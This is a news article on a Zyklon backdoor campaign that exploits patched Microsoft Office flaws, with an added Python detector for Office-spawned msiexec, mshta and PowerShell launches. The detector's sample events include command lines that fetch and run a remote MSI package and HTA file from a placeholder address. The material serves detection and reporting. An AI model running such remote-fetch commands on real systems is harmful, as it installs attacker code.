Criminals are delivering Zyklon malware using three vulnerabilities in Microsoft Office that were recently patched. Security researchers at FireEye reported that the malware campaign leveraging the relatively new Office exploits has been spotted in the wild, distributing an advanced malware that they called a full-featured backdoor.
The campaign exploits three recently disclosed vulnerabilities in Microsoft Office to execute a PowerShell script on the target system to eventually download the final payload. These vulnerabilities include:
CVE-2017-8759: works by tricking the target into opening a specially crafted file.
CVE-2017-11882 (RCE vulnerability): a 17-year-old memory corruption flaw patched in November; “upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object.”
Dynamic Data Exchange Protocol (DDE): “Dynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution,” researchers wrote. “With the help of a PowerShell script, the next payload is downloaded.”
A patched Microsoft Office remote code execution vulnerability (CVE-2017-11882) is also being used to spread a variety of malware such as FAREIT, Ursnif and the Loki info stealer keylogger, which is used to steal cryptocurrency wallet passwords.
In this case, an uncommon method is reused: the payload is launched with the help of the Windows Installer service.
Previous exploitation used the Windows executable mshta.exe to run a PowerShell script, but this attack uses msiexec.exe to exploit the vulnerability.
Other launchers such as wscript.exe, PowerShell, mshta.exe and winword.exe are very common, and security software readily monitors them because other malware abuses the same functions.
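As an added illustration, not taken from the FireEye report or this article, the following Python scans process-creation events for the pattern described above: an Office application launching mshta.exe, PowerShell, wscript.exe or, as in this campaign, msiexec.exe, and notes when the command line points at a remote URL. The "Key=Value | Key=Value" log format and the sample events are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Office applications that should not normally launch script or installer hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Launchers the article names: the commonly watched script hosts plus msiexec.exe,
# the Windows Installer host this campaign switched to.
SUSPICIOUS_CHILDREN = {"msiexec.exe", "mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

def parse_event(line: str) -> ProcEvent:
    # Hypothetical log format, constructed for this example: "Key=Value | Key=Value ...".
    fields = dict(part.split("=", 1) for part in line.split(" | "))
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> Optional[str]:
    """Label an Office-spawned launcher; add '(remote)' when the command line carries a URL."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent not in OFFICE_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return None
    label = f"office->{child[:-4]}"
    return label + (" (remote)" if URL_RE.search(ev.command_line) else "")

def scan(lines):
    """Return (line_number, label) for each event that deserves analyst attention."""
    findings = []
    for n, line in enumerate(lines, start=1):
        label = classify(parse_event(line))
        if label:
            findings.append((n, label))
    return findings

# Constructed sample events; 203.0.113.10 is from a documentation address range, not a real host.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE | Image=C:\Windows\System32\msiexec.exe | CommandLine=msiexec.exe /q /i http://203.0.113.10/pkg.msi",
    r"ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE | Image=C:\Windows\System32\mshta.exe | CommandLine=mshta.exe http://203.0.113.10/stage.hta",
    r"ParentImage=C:\Windows\explorer.exe | Image=C:\Windows\System32\msiexec.exe | CommandLine=msiexec.exe /i C:\Installers\app.msi",
    r"ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE | Image=C:\Windows\splwow64.exe | CommandLine=splwow64.exe 12288",
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))  # the two Word-spawned launchers fetching remote content
```

Only the first two events fire: a local msiexec run from Explorer and Word's own print helper (splwow64.exe) are left alone.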
Zyklon is a full-featured backdoor, first observed in the wild in early 2016, and offers a number of sophisticated capabilities to the attackers who primarily target telecommunications, insurance and financial services. The malware can do a number of things, including:
Downloading and executing additional plugins
Conducting distributed denial-of-service (DDoS) attacks
Self-updating and self-removal